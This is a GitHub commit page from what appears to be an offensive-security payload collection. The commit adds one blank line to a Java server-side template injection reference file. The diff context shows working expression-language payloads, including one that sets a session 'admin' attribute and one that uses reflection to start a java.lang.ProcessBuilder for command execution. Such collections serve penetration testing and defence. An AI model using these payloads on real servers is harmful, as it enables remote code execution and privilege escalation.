Skip to content

Commit b60551e

Browse files
authored
Fix CI/CD markdown
1 parent 3051fc8 commit b60551e

1 file changed

Lines changed: 1 addition & 0 deletions

File tree

  • Server Side Template Injection

Server Side Template Injection/Java.md

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -446,6 +446,7 @@ ${pageContext.request.getSession().setAttribute("admin",true)}
446446
${request.setAttribute("a","".getClass().forName("java.lang.ProcessBuilder").getDeclaredConstructors()[0].newInstance(request.getAttribute("c")).start())}
447447
${request.getAttribute("a")}
448448
```
449+
449450
- Error-Based payload:
450451
451452
```java

0 commit comments

Comments
 (0)